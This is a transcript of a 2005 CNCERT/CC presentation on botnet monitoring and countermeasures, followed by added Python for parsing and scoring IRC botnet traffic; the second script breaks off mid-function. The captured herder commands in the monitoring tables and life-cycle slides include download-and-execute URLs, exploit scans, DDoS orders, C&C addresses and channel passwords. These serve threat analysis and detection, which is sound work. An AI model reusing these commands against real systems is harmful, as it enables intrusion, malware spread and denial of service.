CNCERT/CC: Countermeasures Against Botnets


Uploaded by lilike, posted 08-Jan-2016


DESCRIPTION

CNCERT/CC: Countermeasures Against Botnets. National Computer Network Emergency Response Technical Team/Coordination Center of China, Dr. Chen Mingqi, 17 November 2005, Tianjin. Outline: Part 1, background; Part 2, discovery and handling; Part 3, CNCERT/CC's work (monitoring results and activity patterns, countermeasures); Part 4, analysis of real cases. 1. Background. The three traditional threats to network security: viruses, Trojans and worms (Virus/Trojan/Worm); denial of service (DoS/DDoS); spam. Hackers' motivation has changed: they are now driven by financial gain, no longer by the notoriety and display of skill that came with high-profile attacks. (PowerPoint presentation)

TRANSCRIPT

  • CNCERT/CC: Countermeasures Against Botnets

    2005-11-17

    National Computer Network Emergency Response Technical Team/Coordination Center of China

    Part 1: Background. The three traditional threats to network security: Virus/Trojan/Worm; DoS/DDoS; Spam. Hackers are now driven by money rather than notoriety.

    Industry observations on botnets cited on the slide (most of the surrounding text was lost in extraction): APWG; vendors (Microsoft, anti-virus companies); the ISP Comcast (2004; figure 888 on slide); TrendLabs (9 September 2004; figure 23.5 on slide); SANS on DoS (October 2004; figure 4 on slide); APWG on phishing sites hosted on botnets (November 2004); Korgo, GaoBot and SdBot, three bot/worm families of 2004; CAIDA's analysis of the Witty worm, which was launched from a botnet of roughly 100 pre-compromised hosts.

    The botnet economy

    3.6 cents per bot per week

    6 cents per bot per week (September 2004 postings to SpecialHam.com and Spamforum.biz)

    July 2004: a zombie network offered for rent for spam and phishing (figures 103 and 100 on the slide; their labels were lost). The advertisement as quoted on the slide:

    > 20-30k always online SOCKs4, url is de-duped and updated every 10 minutes. 900/weekly, Samples will be sent on request.
    > Monthly payments arranged at discount prices.
    > $350.00/weekly - $1,000/monthly (USD)
    > Type of service: Exclusive (One slot only)
    > Always Online: 5,000 - 6,000
    > Updated every: 10 minutes

    Part 2: Discovery and handling

    Ways to discover IRC botnets: honeypots (the Honeynet Project's approach); IDS signatures combined with IRC traffic monitoring (CNCERT/CC's work under the national 863-917 project), which can also distinguish a bot from a legitimate IRC bot; and IRC-flow anomaly detection as done by the DDoSVax project.

    Structure of an IRC botnet

    What identifies a botnet: the C&C server's IP address and port, the channel name, and the channel/login password. The herder authenticates to the bots with the login password; the bots then accept commands such as login, update, download and uninstall.

    Handling: (1) identify the C&C server; (2) (second approach, slide text lost in extraction). The slide also asks how to tell a malicious bot from a legitimate IRC BOT.

    CNCERT/CC monitoring results: top 5 botnets, 2005-06-03 to 2005-09-19 (figure 593 on the slide; its label was lost)

    Example: #hotgirls, 29,624 clients. Channel topic: ipscan s.s.s.s dcom2 86400 256 8000 -s; dcombot * wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -s (df.exe is saved as defrag32.exe, i.e. the bot is dropped with a name that looks like a Windows defragmenter).

    Observation period 2005-06-03 to 2005-06-23: 34 IRC C&C servers, broken down (the category labels, probably countries/regions, were lost in extraction) as 18, 5, 4, 2, 2, 1, 1, 1.

    Chart 3: Statistics of user clients of large-scale botnets (total bot clients seen on each observation day)

    Date       | Clients
    2005-06-03 | 48911
    2005-06-08 | 57262
    2005-06-10 | 50209
    2005-06-13 | 41912
    2005-06-15 | 17240
    2005-06-17 | 22911
    2005-06-20 | 20418
    2005-06-22 | 15237

    Botnets observed per sampling day (bothunter data through 2005-06-22). Columns: channel(s), with the channel key after a space where the slide shows one | C&C server IP(s) | clients | observed activity and commands

    2005-06-03 (total 48911 clients)

    #NT#, ##NT## | 24.14.213.135 | 1128 | exploiting IPs
    #NULLROOT#, #liquid#, #OMGLOLBBQ# | | |
    #hotgirls#, #veryhotgirls# | 80.191.168.20, 209.200.13.84 | 39084 | topic: dcombot * wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -s (df.exe saved as defrag32.exe)
    ##pwned##, ##y00## | 207.105.182.101 | 2948 | Downloading update from http://65.75.134.170/~wxware/test/Service.exe
    #Hellas | 195.204.1.132 | 5751 |

    2005-06-08 (total 57262 clients)

    #fat fuckoffh00ker, #visitors tricky, #xt-nt fuckoffh00ker | 81.74.132.235 | 192 | Download http://sentinel.sp1d3y.nl/own2.exe ha.exe; exploiting IPs
    #hotgirls#, #veryhotgirls# | 80.191.168.20, 209.200.13.84 | 39000 | topic: dcombot * wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e -s (df.exe saved as defrag32.exe)
    #master# | 220.151.115.232 | 6265 |
    ##NT## | 24.14.213.135 | 5046 | IP exploit
    #OMGLOBBQ#, #NULLROOT# | | | [DDOS] Flooding :(216.73.112.201) for 650 seconds
    #lc-wks | 202.67.155.250 | 5640 | exploiting IPs
    #SeR 654321 | 211.221.205.58 | 1119 | IP 445 FTP (port 445 scanning, payload over FTP)

    2005-06-10 (total 50209 clients)

    #omgyay 0mg | 207.58.134.228 | 332 | exploiting IPs
    #hotgirls#, #veryhotgirls# | 80.191.168.20, 209.200.13.84 | 27014 | dcombot * wormride -s -t
    #Brappy, #oG#, #hipsi sdadfasd23dfadas423, #12a asdasfGTSdzszsar3, #13b sdadfasd23dfadas423 | 81.75.86.50 | 10271 |
    ##NT## | 24.14.213.135 | 2874 | IP exploit
    #OMGLOBBQ#, #NULLROOT# | 222.104.230.23 | | [DDOS] Flooding :(216.73.112.201 80) for 650 seconds
    #lc-wks | 202.67.155.250 | 3132 | exploiting IPs
    #SeR 654321 | 211.221.205.58 | 6586 | IP 445 FTP
    #For3#, #fearme# | 209.170.170.16 | |

    2005-06-13 (total 41912 clients)

    #omgyay 0mg, #Gunzup Robpwns | 207.58.134.228, 67.39.199.177, 218.56.76.142 | 796 | exploiting IPs (61.174.215.9 reported); from 218.55.76.142: cmd=PRIVMSG;para=#:[UPDATE]:Downloading update from: http://www.reznzdr.com/rBot.exe; and ...from: http://www.reznzdr.com/asnstolen.exe
    #hotgirls#, #veryhotgirls# | 80.191.168.20, 209.200.13.84 | 29624 | dcombot * wormride -s -t
    ##master## (key Master), ##xanax##, ##Go.DJ## | 208.53.169.142, 207.108.170.75, 207.167.215.35, 207.164.223.19 | 1133 | Downloading update from: http://65.75.134.170/~wxwarez/test/Service.exe; [DOWNLOAD]:Link o Dns Not Trovato SUKKIAMELO!: http://ciudad.lationl.com/777/reelay.exe (130.239.38.130)
    #!pwn 1337, #.b0tz elite, #spyware FBISUCK, #asnex, #asn, #!pwn-root | 66.45.255.131 | 7359 | IP exploit; Downloading http://s119796543.onlinehome.us/Lower.exe, http://s119796543.onlinehome.us/tc.exe, http://s119796543.onlinehome.us/yoursite.exe; keylogger output: cmd=PRIVMSG;para=#phattykeylog: (-Micros) [Del][CTRL] (Changed window)
    #SeR 654321 | 211.221.205.58 | 3000 | IP 445 FTP (211.23.16.105 reported)
    #For3#, #fearme# | | |

    2005-06-15 (total 17240 clients)

    #hotgirls#, #veryhotgirls# | 80.191.168.20, 209.200.13.84 | 10018 | dcombot * wormride -s -t
    #betty, ##WHOR3Z##, ##FBOMED# | 218.207.9.11 | 4805 | DCOM exploit scanning; DDoS: cmd=PRIVMSG;para=#betty : [SYN] Flooding : (24.62.139.80) for 111111111 seconds; cmd=PRIVMSG;para=#betty :[DOWNLOAD] : Link o Dns Non Trovato SUKKIAMEL! : http//www.tapionirc.altervista.org/mh.exe
    #ne0, #n03, #ne0n | 61.167.82.194 | 151 | DCOM exploit scanning; cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e
    ##master##, ##pwned##, ##pwend##, ##y00##, ##fatality## | 207.168.215.35, 38.115.133.226, 207.164.233.19, 213.88.181.70 | 1606 | cmd=PRIVMSG;para=##master## : [MAIN]: Removing Bot
    #!pwn 1337, #.b0tz elite, #spyware FBISUCK, #asnex, #asn, #!pwn-root | 66.45.255.131 | 660 | IP exploit; Downloading http://s119796543.onlinehome.us/Lower.exe, http://s119796543.onlinehome.us/tc.exe, http://s119796543.onlinehome.us/mt.exe

    2005-06-17 (total 22911 clients)

    ##master##, ##pwned##, ##y00##, ##fatality## | 207.168.215.35, 38.115.133.226, 207.164.233.19 | 1321 | cmd=PRIVMSG;para=##master## : [MAIN]: Removing Bot; FTP
    #betty b1xvgf, #fbomed#, #boilerhouse flash, ###LeoNarDo###, #.#smash3r#.# | 218.207.9.11, 81.230.22.51, 80.100.68.87 (80.100.22.51 also on slide) | 10242 | ##fbomed## [DDoS]:Flooding: (67.159.18.197:6667) for 300 seconds; DCOM (port 135) scanning; figure 1211 on slide (label lost)
    #hotgirls, #veryhotgirls | 80.191.168.20, 61.152.146.238, 209.200.13.84, 24.21.203.98, 24.184.193.250 | 6338 | dcombot * wormride -s -t
    #ne0, #n03, #ne0n | 61.167.82.194 | 87 | DCOM scanning; cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e; cmd=PRIVMSG;para=#ne0:[DOWNLOAD]:Downloading URL : http://www.goa_irc.co.uk/wosten/new4.exe to new4.exe
    #bitch fuckinghoe, #blah, #bleh, #h2o pizpwna, #meh nizzle, #test fuckinghoe | 210.108.10.150, 211.226.12.159 | 4923 |

    2005-06-20 (total 20418 clients)

    #ne0, ##xdcc##, ##ownage## | 61.167.82.194 | 28 |
    #hotgirls, #veryhotgirls, #xotgipls | 209.200.13.84, 61.153.201.2, 218.22.25.142 | 13049 | dcombot
    #NULLROOT#, #OMGLOLBBQ#, #kush# | 222.104.230.41 | 295 |
    #AIM# AOLOL, #0x7f shameep | 24.14.213.135 | 83 |
    #12a asdasfGTSdzszsar3; #13b sdadfasd23dfadas423; #ago-priv trouble; #brap rotasgobrap; #brappy asd3sadasdsadgfsd; #decomp sdadfasd23dfadas423; #fbsd lovesme; #FC asdasfGTSdzszsar3; #fuk3d lovesme; #hipsi sdadfasd23dfadas423; #hound lovesme; #linux lovesme; #marissa lovesme; #n0 3nt3r; #newmsn pass; #nicole.com lovesme; #nix lovesme; #oG# unknown; #ssh lovesme; #tX lovesme | 211.78.141.148 | 6963 |

    2005-06-22 (total 15237 clients)

    #fbomed# (##fbomed## FUCK3R), #sluTTy# p1mp3d, #betty b1xvgf, #boilerhouse flash, #eWg-BOT | 218.207.9.11 | 4014 |
    #NULLROOT#, #OMGLOLBBQ#, #OMG# | 222.104.230.41 | 729 |
    #hotgirls, #veryhotgirls | 209.200.13.84, 61.153.201.2 | 6322 | dcombot
    #omgyay, #Gunzup Robpwns, #omgyay 0mg | 66.45.249.155 | 99 | IP
    #12a asdasfGTSdzszsar3; #13b sdadfasd23dfadas423; #ago-priv trouble; #brap rotasgobrap; #brappy asd3sadasdsadgfsd; #decomp sdadfasd23dfadas423; #fbsd lovesme; #FC asdasfGTSdzszsar3; #fuk3d lovesme; #hipsi sdadfasd23dfadas423; #hound lovesme; #linux lovesme; #marissa lovesme; #n0 3nt3r; #newmsn pass; #nicole.com lovesme; #nix lovesme; #oG# unknown | 211.78.141.148 | 4073 |

    Botnets tracked in this period (17): hotgirls; betty; NULLROOT; bitch fuckinghoe; Brappy; fat fuckoffh00ker; Hellas; lc-wks; master; ne0; NT; omgyay 0mg; pwn 1337; pwned; SeR 654321; AIM; 12a asdasfGTSdzszsar3. Sampling days (Excel date serials 38506 to 38523 on the slide): 2005-06-03, 06-08, 06-10, 06-13, 06-15, 06-17, 06-20.

    Update commands seen between sampling days:

    2005-06-18 to 06-20, #ne0 (61.167.82.194): cmd=TOPIC;para=#ne0 : download http://goa-irc.co.uk/wosten/new3.exe 1 (sibling channels ##xdcc##, ##ownage##)

    2005-06-20 to 06-22, #fbomed# (218.207.9.11): cmd=PRIVMSG;para=#eWg-BOT:.(UPDATE):Downloading update from :http://champion.altervista.org/suk.exe

    C&C server IP addresses observed (the number in parentheses after some entries is a figure from the slide whose column label was lost):

    210.108.10.150 (20); 211.221.205.58 (5); 211.226.12.159 (4); 218.55.76.142 (2); 222.104.230.23 (2); 207.58.134.228 (1); 207.105.182.101 (1); 207.108.170.75 (1); 207.164.223.19 (1); 207.164.233.19; 207.167.215.35 (35); 207.168.215.35; 207.58.134.228; 208.53.169.142; 209.170.170.16; 209.200.13.84; 24.14.213.135; 24.184.193.250; 24.21.203.98; 38.115.133.226; 66.45.255.131; 67.39.199.177; 80.191.168.20; 195.204.1.132; 220.151.115.232; 130.239.38.130; 213.88.181.70; 202.67.155.250; 81.74.132.235; 81.75.86.50; 61.167.82.194; 218.207.9.11; 61.152.146.238; 211.78.141.148; 66.45.249.155

    Chart data (Excel date serials converted to dates): bot clients of all tracked large-scale botnets, and of #hotgirls# alone

    Date       | All tracked | #hotgirls#
    2005-06-03 | 48911       | 39084
    2005-06-08 | 57262       | 39000
    2005-06-10 | 50209       | 27014
    2005-06-13 | 41912       | 29624
    2005-06-15 | 17240       | 10018
    2005-06-17 | 22911       | 6338
    2005-06-20 | 20418       | 13049
    2005-06-22 | 15237       | 6322

    Statistics of user clients of large scale botnets (Hotgirls)

    Large botnets of the 2005-08-19 to 2005-09-19 period (figure 15 on the slide; its label was lost)

    Chart 2: the Diablo botnet (channel !cz2cezka, C&C 205.209.149.40), clients per sampling day, read from the chart's data sheet "diablo" (Excel date serials converted):

    Date       | Clients
    2005-08-19 | 157142
    2005-08-22 | 83263
    2005-08-24 | 53366
    2005-08-26 | 18753
    2005-08-29 | 25795
    2005-08-31 | 17333
    2005-09-02 | 24054
    2005-09-07 | 23266
    2005-09-14 | 19906
    2005-09-19 | 21498

    Botnet channels observed from 2005-06-03 to 2005-09-19 (45): 1 !cz2cezka (Diablo); 2 !pwn1337; 3 123456789; 4 12aasdasfGTSdzszsar3; 5 aabc; 6 AIM; 7 asn; 8 asnFBISUCK; 9 bbot; 10 betty; 11 bettyb1xvgf; 12 bitchfuckinghoe; 13 blah; 14 boilerhouseflash; 15 Brappy; 16 CaMz-R; 17 com; 18 dd0s; 19 diablo; 20 DWdepth; 21 Eddie; 22 fatassfat20; 23 fatfuckoffh00ker; 24 fbomed; 25 h2; 26 hellas; 27 hotgirls; 28 lc-wks; 29 Master; 30 MP3; 31 msn; 32 ne0; 33 NewBot; 34 NT; 35 NULLROOT; 36 omgyay; 37 omgyay0mg; 38 phat; 39 phatbot; 40 pwned; 41 ruff; 42 SeR654321; 43 sKull; 44 staff; 45 wubix.


    One herder, several botnets: commands issued by the operator "gunit" on 2005-08-29 at 12:00 (the sender hostmask survives only partly as gunit!DIE@nese...; the rest was lost to e-mail obfuscation in extraction)

    PRIVMSG #asnftp :.login booties -s
    PRIVMSG #nesebot :.login nesebot -s
    PRIVMSG #urxbot :.login prx -s
    TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s
    TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s
    TOPIC #forasn :.adv.start asn 120 5 0 -r
    TOPIC #phat# :.scan.startall
    TOPIC #urxbot :.advscan dcom135 500 3 0 -r

    Botnet life cycle: creation. A host infected by a bot-dropping worm (Deloder, Mytob, Zotob) connects to the C&C server, joins the channel and receives its first orders from the channel topic (IRC numeric 332). Captured 2005-09-18 at 09:00:

    332 [botz]-96018 #ass :!upd4t3z http://peckno.site.voila.fr/win2k.exe
    [botz]-96018 connects to 67.43.*.*:6667 and sends JOIN #suce fuck (channel key "fuck"); server name r00t.expl01t3d.org
    332 Suce-548836 #suce :-ntscan 254 1000 -a b

    Botnet life cycle: spread. Scan/exploit commands are pushed to the whole botnet through the channel topic (TOPIC, or numeric 332 on join):

    TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b s
    TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r s
    TOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.x
    TOPIC #XOwneD :!ntscan 350 1000 -a -b
    TOPIC #111 :.advscan lsass_445 100 5 120 -r
    332 nffe #fanta :.scan pnp 50 6000 221
    332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r
    332 #tvr0x :^advscan dcom135 300 5 0 -r s
    332 #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h!
    332 ...#r00x %advscan dcom135 300 5 0 -r -b s
    332 ...#asn :.scanall s
    332 ...#.wadside :`adv.start lsass 150 6 9999 -b -r s
    332 ...#.pwnt. :.xscan msass 300 5 0 -b -s
    332 ...#.#smash3r#.# :.root.start msass 200 0 5 -a -r s
    332 ...##scarezsql## :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100

    The module names map directly onto the Windows vulnerabilities of the day: dcom135 is the RPC/DCOM flaw (MS03-026), lsass the LSASS overflow (MS04-011), asn1smb the ASN.1 library flaw reached over SMB (MS04-007), WksSvc the Workstation service overflow (MS03-049) and pnp the Plug and Play flaw (MS05-039) that Zotob exploited. Several topics restrict scanning to a 201.x.x.x or 221.x.x.x range, so the herder can aim the botnet at a chosen network.

    Botnet life cycle: transfer. The herder moves bots to a new C&C. The slide lists three variants, of which only the subjects survive extraction: (1) the IRC server (...); (2) the IRC server; (3) the IRC server and the bots. Observed 2005-09-27.

    Botnet life cycle: update. Bots are told to fetch new binaries through TOPIC or PRIVMSG. Captured 2005-09-18 at 08:00:

    PRIVMSG #hb3 :.hell.download http://elizabethwargo.com/cannon/php1/images/duh.exe explore.exe -e
    TOPIC #rooted :@sdownload http://site.voila.fr/qhzteam/asn.exe
    PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe

    stolenBot, 2005-09-19 at 02:00, channel #NotaBot: the herder swaps spreading modules in the running bots

    PRIVMSG #NotaBot :.spread.remove.module mssql
    PRIVMSG #NotaBot :.spread.remove.module dcom1
    PRIVMSG #NotaBot :.spread.add.module vnc_scan
    PRIVMSG #NotaBot :.spread.add.module radmin_empty

    Botnet life cycle: activity (spyware, scanning, DDoS)

    2005-09-19 at 12:00: PRIVMSG #NotaBotslog :[ VNC Found ] :218.14.*.*:111111 (bots report VNC servers found by scanning)
    PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty (spreading modules currently loaded)
    2005-09-27 at 20:00: TOPIC ##bla :.ddos.random 81.169.*.* 80 120 (DDoS against 81.169.*.* on port 80 for 120 seconds)
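    The command lines on the creation, spread, update and activity slides above (and the login, update, download and uninstall verbs listed under the IRC botnet structure) follow a small grammar that a monitor can normalise before alerting. The following Python is an added example written for this page, not CNCERT/CC's tooling: it splits raw IRC lines into prefix, command, parameters and trailing text, strips the command sigils seen in the captures (., !, @, +, ^, %, `, -), and classifies the payload as a scan, download, ddos, login, module or control command. The sample lines are constructed from the captures shown here with invented nick!user@host prefixes. Reading the numeric scan parameters as threads, per-thread delay in seconds and duration in minutes, and -r/-s/-b as random targets, silent and local class B, follows the rBot/rxBot convention and is an assumption, not a statement from the slides.

```python
"""Normaliser for IRC botnet C&C commands of the kind captured on the slides
(rBot/Agobot-style TOPIC and PRIVMSG payloads).  Added example, not CNCERT/CC code.

Assumed readings (not stated on the slides): scan commands follow the rxBot
convention "<verb> <module> <threads> <delay-seconds> <minutes> [<net>] [-r -s -b]"
(0 minutes = run until stopped; -r random targets, -s silent, -b local class B);
".ddos.random <net> <port> <seconds>"; any command carrying a URL is a
download/update instruction.
"""
import re
from dataclasses import dataclass, field

SIGILS = ".!@$^%+`-~"          # prefixes seen in the captures: .advscan !ntscan @sdownload +advscan
SCAN_VERBS = {"advscan", "adv.start", "ntscan", "xscan", "root.start", "scan",
              "scan.start", "scanall", "scan.startall", "asc"}
URL_RE = re.compile(r"https?://[^\s;]+")
FLAG_RE = re.compile(r"-[a-z]", re.I)

# Constructed lines modelled on the captures shown in the deck; the nick!user@host
# prefixes are invented, the payloads are the ones quoted on the slides.
SAMPLE_LINES = [
    ":r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a -b",
    ":gunit!x@y TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s",
    ":op!x@y TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r -s",
    ":op!x@y PRIVMSG #ne0 :[DOWNLOAD]:Downloading URL : http://www.freewebs.com/matflp/undertow.exe to c:/undertow.exe -e",
    ":op!x@y TOPIC ##bla :.ddos.random 81.169.*.* 80 120",
    ":op!x@y PRIVMSG #NotaBot :.spread.add.module vnc_scan",
    ":gunit!x@y PRIVMSG #urxbot :.login prx -s",
    ":alice!x@y PRIVMSG #chat :hello everyone",
]


@dataclass
class BotCommand:
    channel: str
    family: str                 # scan | download | ddos | login | module | control
    verb: str
    module: str = ""            # scanner/exploit module, spread module, or login password
    params: list = field(default_factory=list)   # scan: [threads, delay, minutes]; ddos: [port, seconds]
    target: str = ""            # target network, or local save path of a download
    url: str = ""
    flags: list = field(default_factory=list)


def parse_irc_line(line):
    """Split a raw IRC line into (prefix, command, middle params, trailing param)."""
    prefix, line = "", line.strip()
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else "")


def classify_command(channel, text):
    """Map a TOPIC/PRIVMSG/332 payload to a BotCommand, or None if it is ordinary chat."""
    text = text.strip().rstrip(";")
    while len(text) > 1 and text[0] in SIGILS and text[1] != " ":   # "!.ntscan" -> "ntscan"
        text = text[1:]
    tokens = text.split()
    if not tokens:
        return None
    verb = tokens[0].lower()
    flags = [t for t in tokens[1:] if FLAG_RE.fullmatch(t)]
    args = [t for t in tokens[1:] if t not in flags]
    url = URL_RE.search(text)
    if url:                                   # download / update / !upd4t3z variants
        dest = args[args.index("to") + 1] if "to" in args and args.index("to") + 1 < len(args) else ""
        return BotCommand(channel, "download", verb, target=dest, url=url.group(0), flags=flags)
    if verb in SCAN_VERBS:
        cmd = BotCommand(channel, "scan", verb, flags=flags)
        cmd.module = args.pop(0).lower() if args and not args[0].isdigit() else verb
        nums = [int(t) for t in args if t.isdigit()]
        cmd.params = (nums + [0, 0, 0])[:3]
        nets = [t for t in args if not t.isdigit()]
        cmd.target = nets[0] if nets else ""
        return cmd
    if verb.startswith("ddos") or verb in {"syn", "udp", "icmp", "ping"}:
        nets = [t for t in args if not t.isdigit()]
        return BotCommand(channel, "ddos", verb, params=[int(t) for t in args if t.isdigit()],
                          target=nets[0] if nets else "", flags=flags)
    if verb == "login":
        return BotCommand(channel, "login", verb, module=args[0] if args else "", flags=flags)
    if verb.startswith("spread."):
        return BotCommand(channel, "module", verb, module=args[0] if args else "")
    if verb in {"remove", "uninstall", "die", "reconnect", "update"}:
        return BotCommand(channel, "control", verb, flags=flags)
    return None


def extract_commands(lines):
    """Return BotCommands from raw IRC lines; only channel-directed TOPIC/PRIVMSG/332 are inspected."""
    found = []
    for line in lines:
        _, command, params, trailing = parse_irc_line(line)
        chans = [p for p in params if p.startswith("#")]
        if command in {"TOPIC", "PRIVMSG", "332"} and chans and trailing:
            cmd = classify_command(chans[-1], trailing)
            if cmd:
                found.append(cmd)
    return found


def summarise(cmds):
    """Count commands per family: the per-channel view a monitor would report."""
    out = {}
    for c in cmds:
        out[c.family] = out.get(c.family, 0) + 1
    return out


if __name__ == "__main__":
    for c in extract_commands(SAMPLE_LINES):
        print(c)
    print(summarise(extract_commands(SAMPLE_LINES)))
```

    The sigil loop matters in practice: the same herder writes the same command as .advscan, +advscan, %advscan or !.ntscan depending on the bot family's command prefix, and a signature keyed on one spelling misses the others. Treating any payload with a URL as a download instruction catches the !upd4t3z and @sdownload variants without enumerating verbs.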

    Botnet life cycle: decease. Ways a botnet ends (only fragments of the slide survive extraction):

    1. C&C servers (...) and their DDNS/DNS names
    2. C&C server ... bots
    3. ... bots
    4. ...
    5. the bots are ordered to remove themselves (.remove / .uninstall)
    6. ... bots

    Part 3: CNCERT/CC's work on botnets (slide text partly lost in extraction)

    1. December 2004: IRC botnet research under the national 863-917 project
    2. IRC botnet monitoring
    3. July 2005: honeypot deployment
    4. botnet ..., bot ...
    5. bot ...
    6. ..., bot ...

    DDoS

    1. (slide text lost)
    2. DDoS botnet (slide text lost)

    Part 4, case (1): BKDR_VB.CQ, a Visual Basic backdoor whose \url configuration points it at HTTP and SMTP (slide text partly lost).

    Case (1): IRC server hostnames used by the bots (dynamic-DNS names):

    anthony.ipv6.usr.aswind.com, peter.freehost.aswind.net, carlyle.dns2go.aswind.net, khond.vip.vhost.ourmidi.com, lamen.vhost.ourmidi.com, massuse.ipv6.free.ourmidi.net, bruce.free.ourmidi.net, john.usr.aswind.com

    Case (1): C&C IP addresses and ports

    216.152.*.* 6667; 212.204.*.* 6667; 64.12.*.* 6667; 207.68.*.* 6667; 61.197.*.* 8000; 218.157.*.* 443; 221.146.*.* 554; 219.153.*.* 8000; also 202.108.*.*

    Only half of the servers use the standard IRC port 6667; the others listen on 443, 554 and 8000 so that the C&C traffic looks like HTTPS, RTSP or web-proxy traffic and passes port-based filtering.

    Case (1): size of the botnet (figures on the slide: 12 106000 08000 3712; their labels were lost). The infected hosts were ADSL users in 60.2.*.*.

    Case (1): figures on the slide: 1171641 IP; BKDR_VB.CQ 156120 (labels lost in extraction).

    Case (1): 215521 (2004-12-13 to 2005-01-10; label lost in extraction).

    Case (1): CNCERT/CC's handling (slide text lost in extraction).

    Case (1): countermeasures against the botnet. 1. CNCERT's removal tool: http://www.cert.org.cn/articles/tools/common/2004123022037.shtml; 2. (slide text lost)

    Case (1): 3. (slide text lost)

    Case (2): rasinf.exe and ipxsrv.exe. ipxsrv.exe terminates QQ and IE; ipxsrv.exe and msapp.exe run together; rasinf.exe spreads through IPC$ shares; the Kuang2 virus (k2.exe) infects msapp.exe. Figures on the slide: 1200, 223; October 2004 botnet (labels lost in extraction).

    Summary (slide text partly lost): 1. C&C server; 2. bot; 3. C&C server; 4. ...; 5. botnet

    CNCERT/CC. Website: www.cert.org.cn. Tel: 8299 0999 (hotline), +86-10-8299 1000. E-mail: (address lost to obfuscation in extraction)

    Notes

    Botnets in 2004: botnets were behind spam and DDoS; bot and botnet counts for 2004 and 2003 (figures lost in extraction).

    Botnets are used for DDoS and identity theft. Bots were collected with a Honeywall from November 2004 to 1 March 2005 (one Honeywall) and with mwcollect [8] (figures 180, 305, 500, 800 on the slide; labels lost). From November 2004 to January 2005, 406 DDoS attacks against 179 targets were observed [4].

    Detecting bots in IRC traffic: 1) fast-joining bots: many bots join the IRC server and channel within a short time; 2) long-standing connections: bots stay connected for a long time and are not talkative; they mostly exchange ping/pong (DDoSVax [5]). Bot detection by IDS: an IDS that understands the IRC RFC can match bot commands inside IRC traffic, including IRC on non-standard ports, and can check for socks v4 servers. Bots also answer a command identically, for example after TOPIC #rBot :.advscan lsass 200 5 0 -r s the clients a, b and c each report the same TOPIC #rBot :.advscan lsass 200 5 0 -r s, which no group of human users would do. c) The botnet's bots (slide text lost).
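    The notes above list the traffic-level signs that DDoSVax and CNCERT/CC used to tell a bot channel from a human one: many clients joining in a burst, connections that stay up but never say anything beyond PING/PONG, and clients that all answer a TOPIC command with the same status line. The following Python is an added example for this page, not DDoSVax's or CNCERT/CC's code: it scores the channels in a constructed IRC event log on those three signals. The log format (seconds, nick, channel, event, text), the thresholds, and the sample channels #rBot, #idle and #chat are assumptions made for the example.

```python
"""Behavioural scoring of IRC channels for botnet-like activity.
Added example (not CNCERT/CC or DDoSVax code).  Signals, per channel:
  join_burst   - most JOINs seen inside any 60-second window (fast-joining bots)
  silent_ratio - share of joined clients that never send a PRIVMSG (long-lived, not talkative)
  echo_ratio   - largest share of clients answering a TOPIC with the same normalised
                 text within 10 s (bots all acknowledge the same command)
Log format (assumed): (seconds, nick, channel, event, text), event in JOIN/PONG/PRIVMSG/TOPIC.
"""
import re
from collections import defaultdict


def build_sample_log():
    """Constructed sample, not a real capture: 40 bots in #rBot, 15 quiet bots in #idle, 6 people in #chat."""
    log = []
    for i in range(40):                       # bots join within ~30 s and only answer PINGs
        nick = f"[NT]-{100000 + i}"
        log.append((i * 0.7, nick, "#rBot", "JOIN", ""))
        log.append((600 + i * 0.1, nick, "#rBot", "PONG", ""))
    log.append((900.0, "herder", "#rBot", "TOPIC", ".advscan lsass 200 5 0 -r -s"))
    for i in range(40):                       # every bot acknowledges the scan command alike
        log.append((901 + i * 0.05, f"[NT]-{100000 + i}", "#rBot", "PRIVMSG",
                    f"[SCAN]: Random Port Scan started on 10.{i}.x.x:445 "
                    "with a delay of 5 seconds for 0 minutes using 200 threads."))
    for i in range(15):                       # a quieter bot channel: slow joins, never a word
        log.append((i * 120.0, f"sdbot{i}", "#idle", "JOIN", ""))
        log.append((3000.0 + i, f"sdbot{i}", "#idle", "PONG", ""))
    chat = ["anyone up for lunch?", "yeah, 12:30?", "works for me",
            "did you see the patch notes", "not yet, link?", "sure, one sec"]
    for i, nick in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        log.append((i * 100.0, nick, "#chat", "JOIN", ""))   # humans trickle in over 10 min
        for k in range(3):
            log.append((700.0 + i * 10 + k, nick, "#chat", "PRIVMSG", chat[(i + k) % len(chat)]))
    return sorted(log)


def normalise(text):
    """Collapse digits so per-bot status lines that differ only in numbers compare equal."""
    return re.sub(r"\d+", "#", text.lower())


def analyse(log, join_window=60.0, echo_window=10.0):
    """Return per-channel metrics from a list of (seconds, nick, channel, event, text)."""
    by_chan = defaultdict(list)
    for ev in log:
        by_chan[ev[2]].append(ev)
    report = {}
    for chan, evs in by_chan.items():
        evs.sort()
        joins = [t for t, _, _, e, _ in evs if e == "JOIN"]
        clients = {n for _, n, _, e, _ in evs if e == "JOIN"}
        burst, lo = 0, 0                      # sliding window over join times
        for hi, t in enumerate(joins):
            while t - joins[lo] > join_window:
                lo += 1
            burst = max(burst, hi - lo + 1)
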